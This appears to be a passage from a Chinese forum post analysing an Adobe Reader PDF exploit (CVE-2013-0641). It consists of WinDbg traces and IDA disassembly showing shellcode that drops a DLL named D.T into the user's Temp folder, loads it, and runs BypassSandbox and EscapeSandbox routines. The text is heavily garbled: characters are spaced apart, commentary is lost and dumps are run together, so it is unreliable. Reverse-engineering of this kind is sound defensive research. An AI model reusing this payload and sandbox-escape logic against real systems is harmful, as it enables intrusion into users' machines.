e a x = 6 1 b 7 b 1 e c   e b x = 0 0 0 0 0 0 0 1   e c x = 6 6 7 3 0 0 0 0   e d x = 0 0 d 5 7 5 5 c   e s i = 1 1 8 4 5 d c 0   e d i = 1 1 8 4 5 f e c e i p = 6 1 a 2 9 2 a c   e s p = 1 1 8 4 5 f e c   e b p = 0 0 5 0 d d 9 c   i o p l = 0   n v   u p   e i   p l   n z   n a   p o   n c c s = 0 0 2 3   s s = 0 0 2 b   d s = 0 0 2 b   e s = 0 0 2 b   f s = 0 0 5 3   g s = 0 0 2 b   e f l = 0 0 2 0 0 2 0 2 A c r o F o r m ! D l l U n r e g i s t e r S e r v e r + 0 x 3 7 2 9 0 9 : 6 1 a 2 9 2 a c   f f 1 0   c a l l   d w o r d   p t r   [ e a x ]   d s : 0 0 2 b : 6 1 b 7 b 1 e c = { k e r n e l 3 2 ! G e t P r o c A d d r e s s   ( 7 5 4 2 1 2 0 2 ) } 1 1 8 4 5 f e c   6 6 7 3 0 0 0 0   6 1 d a e 0 4 7   6 1 5 1 e 5 9 8   6 1 a 8 7 6 8 d   1 1 8 4 6 0 0 0   6 1 b 9 8 6 a 0   6 1 5 7 f 6 8 7   6 1 a 8 7 6 6 4 6 1 d a e 0 4 7   7 7   6 3   7 3   7 3   7 4   7 2   0 0   4 1   4 4   4 d   5 2   6 5   7 3   6 f   7 5   7 2   6 3   6 5   w c s s t r . k e r n e l 3 2 ! G e t T e m p P a t h A , A P I , A P I G e t T e m p P a t h A , , ( ) . 0 : 0 0 0 >   p e a x = 7 5 4 4 2 b 7 4   e b x = 0 0 0 0 0 0 0 1   e c x = 7 5 4 1 0 0 0 0   e d x = 7 5 4 1 0 0 0 0   e s i = 1 1 8 4 5 d c 0   e d i = 1 1 8 4 6 2 a 0 e i p = 6 1 5 1 e 5 9 8   e s p = 1 1 8 4 6 2 a c   e b p = 1 1 8 4 6 1 0 4   i o p l = 0   n v   u p   e i   p l   n z   n a   p e   n c c s = 0 0 2 3   s s = 0 0 2 b   d s = 0 0 2 b   e s = 0 0 2 b   f s = 0 0 5 3   g s = 0 0 2 b   e f l = 0 0 2 0 0 2 0 6 A c r o F o r m ! P l u g I n M a i n + 0 x c 2 6 a : 6 1 5 1 e 5 9 8   f f e 0   j m p   e a x   { k e r n e l 3 2 ! G e t T e m p P a t h A   ( 7 5 4 4 2 b 7 4 ) } f o p e n A b o b e , 1 C : U s e r s A D M I N I ~ 1 A p p D a t a L o c a l T e m p a c r o r d 3 2 _ s b x D . T , 2 w b , ( ) . 0 : 0 0 0 >   p e a x = 6 1 b 7 b 6 6 0   e b x = 0 0 0 0 0 0 0 1   e c x = 0 0 0 0 b 4 0 0   e d x = 0 0 0 0 0 1 9 e   e s i = 1 1 8 4 5 d c 0   e d i = 1 1 8 4 6 3 b c e i p = 6 1 5 1 e 3 e 1   e s p = 1 1 8 4 6 3 3 0   e b p = 1 1 8 4 6 1 0 4   i o p l = 0   n v   u p   e i   p l   n z   n a   p o   n c c s = 0 0 2 3   s s = 0 0 2 b   d s = 0 0 2 b   e s = 0 0 2 b   f s = 0 0 5 3   g s = 0 0 2 b   e f l = 0 0 2 0 0 2 0 2 A c r o F o r m ! P l u g I n M a i n + 0 x c 0 b 3 : * * *   E R R O R :   S y m b o l   f i l e   c o u l d   n o t   b e   f o u n d .   D e f a u l t e d   t o   e x p o r t   s y m b o l s   f o r   C : W i n d o w s s y s t e m 3 2 M S V C R 1 0 0 . d l l   - 6 1 5 1 e 3 e 1   f f 2 0   j m p   d w o r d   p t r   [ e a x ]   d s : 0 0 2 b : 6 1 b 7 b 6 6 0 = { M S V C R 1 0 0 ! f o p e n   ( 6 6 7 9 3 d c c ) } 0 : 0 0 0 >   d d   1 1 8 4 6 3 3 0 1 1 8 4 6 3 3 0   6 1 a 8 7 6 8 d   6 1 d a e 1 0 1   6 1 d a e 0 1 5   6 1 a 8 7 6 6 4 6 1 d a e 1 0 1   4 3   3 a   5 c   5 5   7 3   6 5   7 2   7 3   5 c   4 1   4 4   4 d   4 9   4 e   4 9   7 e   3 1   5 c   C : U s e r s A D M I N I ~ 1 6 1 d a e 1 1 3   4 1   7 0   7 0   4 4   6 1   7 4   6 1   5 c   4 c   6 f   6 3   6 1   6 c   5 c   5 4   6 5   6 d   7 0   A p p D a t a L o c a l T e m p 6 1 d a e 1 2 5   5 c   6 1   6 3   7 2   6 f   7 2   6 4   3 3   3 2   5 f   7 3   6 2   7 8   5 c   4 4   2 e   5 4   0 0   a c r o r d 3 2 _ s b x D . T . 6 1 d a e 0 1 5   7 7   6 2   0 0   4 3   7 2   7 9   7 0   7 4   5 3   7 4   7 2   6 9   6 e   6 7   5 4   6 f   4 2   6 9   w b . , , 使 f c l o s e , ( ) 0 : 0 0 0 >   p e a x = 6 1 b 7 b 5 8 4   e b x = 0 0 0 0 0 0 0 1   e c x = 6 6 7 5 1 3 7 0   e d x = 0 0 0 0 0 0 0 0   e s i = 1 1 8 4 5 d c 0   e d i = 1 1 8 4 6 3 b 4 e i p = 6 1 5 1 e 3 e 1   e s p = 1 1 8 4 6 3 d 0   e b p = 1 1 8 4 6 1 0 4   i o p l = 0   n v   u p   e i   p l   n z   n a   p o   n c c s = 0 0 2 3   s s = 0 0 2 b   d s = 0 0 2 b   e s = 0 0 2 b   f s = 0 0 5 3   g s = 0 0 2 b   e f l = 0 0 2 0 0 2 0 2 A c r o F o r m ! P l u g I n M a i n + 0 x c 0 b 3 : 6 1 5 1 e 3 e 1   f f 2 0   j m p   d w o r d   p t r   [ e a x ]   d s : 0 0 2 b : 6 1 b 7 b 5 8 4 = { M S V C R 1 0 0 ! f c l o s e   ( 6 6 7 4 a 8 6 4 ) } , L o a d L i b r a r y A D . T , C : U s e r s A D M I N I ~ 1 A p p D a t a L o c a l T e m p a c r o r d 3 2 _ s b x D . T , ( ) . 0 : 0 0 0 >   p
e a x = 6 1 b 7 b 2 3 4   e b x = 0 0 0 0 0 0 0 1   e c x = 6 6 7 4 a 8 b 9   e d x = 0 0 2 e e 3 b 8   e s i = 1 1 8 4 5 d c 0   e d i = 1 1 8 4 6 3 b 4 e i p = 6 1 a 2 9 2 a c   e s p = 1 1 8 4 6 3 e 4   e b p = 1 1 8 4 6 1 0 4   i o p l = 0   n v   u p   e i   p l   z r   n a   p e   n c c s = 0 0 2 3   s s = 0 0 2 b   d s = 0 0 2 b   e s = 0 0 2 b   f s = 0 0 5 3   g s = 0 0 2 b   e f l = 0 0 2 0 0 2 4 6 A c r o F o r m ! D l l U n r e g i s t e r S e r v e r + 0 x 3 7 2 9 0 9 : 6 1 a 2 9 2 a c   f f 1 0   c a l l   d w o r d   p t r   [ e a x ]   d s : 0 0 2 b : 6 1 b 7 b 2 3 4 = { k e r n e l 3 2 ! L o a d L i b r a r y A   ( 7 5 4 2 4 b c 6 ) } 0 : 0 0 0 >   d d   1 1 8 4 6 3 e 4 1 1 8 4 6 3 e 4   6 1 d a e 1 0 1   6 1 a 6 8 5 5 1   6 1 b 7 b 0 d 4   6 1 a 2 9 2 a c 6 1 d a e 1 0 1   4 3   3 a   5 c   5 5   7 3   6 5   7 2   7 3   5 c   4 1   4 4   4 d   4 9   4 e   4 9   7 e   3 1   5 c   C : U s e r s A D M I N I ~ 1 6 1 d a e 1 1 3   4 1   7 0   7 0   4 4   6 1   7 4   6 1   5 c   4 c   6 f   6 3   6 1   6 c   5 c   5 4   6 5   6 d   7 0   A p p D a t a L o c a l T e m p 6 1 d a e 1 2 5   5 c   6 1   6 3   7 2   6 f   7 2   6 4   3 3   3 2   5 f   7 3   6 2   7 8   5 c   4 4   2 e   5 4   0 0   a c r o r d 3 2 _ s b x D . T . C V E - 2 0 1 3 - 0 6 4 1 , D . T L 2 P . T , D . T ( 线 D L L ) , ( D u p l i c a t e ) , D L L , 线 , 线 1 , 线 2 , 8 , , ( ) . . t e x t : 1 0 0 0 2 3 6 4   c a l l   G e t R e a d e r V e r s i o n . t e x t : 1 0 0 0 2 3 6 9   c m p   e a x ,   8 . t e x t : 1 0 0 0 2 3 6 C   j b e   s h o r t   l o c _ 1 0 0 0 2 3 8 6   ;   j u m p t a b l e   1 0 0 0 2 3 4 5   d e f a u l t   c a s e . t e x t : 1 0 0 0 2 3 6 E   p u s h   0   ; . t e x t : 1 0 0 0 2 3 7 0   p u s h   0   ; . t e x t : 1 0 0 0 2 3 7 2   p u s h   0   ; . t e x t : 1 0 0 0 2 3 7 4   p u s h   o f f s e t   B y p a s s S a n d b o x   ;   l p S t a r t A d d r e s s . t e x t : 1 0 0 0 2 3 7 9   p u s h   1 0 0 0 0 0 h   ;   d w S t a c k S i z e . t e x t : 1 0 0 0 2 3 7 E   p u s h   0   ; . t e x t : 1 0 0 0 2 3 8 0   c a l l   C r e a t e T h r e a d   ;   线 . t e x t : 1 0 0 0 2 3 8 6   l o c _ 1 0 0 0 2 3 8 6 : . t e x t : 1 0 0 0 2 2 F 1   D W O R D   _ _ s t d c a l l   B y p a s s S a n d b o x ( L P V O I D ) . t e x t : 1 0 0 0 2 2 F 1   B y p a s s S a n d b o x   p r o c   n e a r . t e x t : 1 0 0 0 2 2 F 1   c a l l   S u s p e n d O t h e r T h r e a d   ;   线 . t e x t : 1 0 0 0 2 2 F 6   c a l l   G e t R e a d e r V e r s i o n   ;   . t e x t : 1 0 0 0 2 2 F B   m o v   r e a d e r _ v e r s i o n ,   e a x . t e x t : 1 0 0 0 2 3 0 0   c a l l   C r e a t e L 2 P _ T   ;   L 2 P . T . t e x t : 1 0 0 0 2 3 0 5   c m p   r e a d e r _ v e r s i o n ,   9 . t e x t : 1 0 0 0 2 3 0 C   j b e   s h o r t   L o a d D l l _ L 2 P _ T   ;   9 L 2 P . T , 9 . t e x t : 1 0 0 0 2 3 0 E   c a l l   E s c a p e S a n d b o x   ;   . t e x t : 1 0 0 0 2 3 1 3   p u s h   0   ;   u E x i t C o d e . t e x t : 1 0 0 0 2 3 1 5   c a l l   E x i t P r o c e s s   ;   退 ( )
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理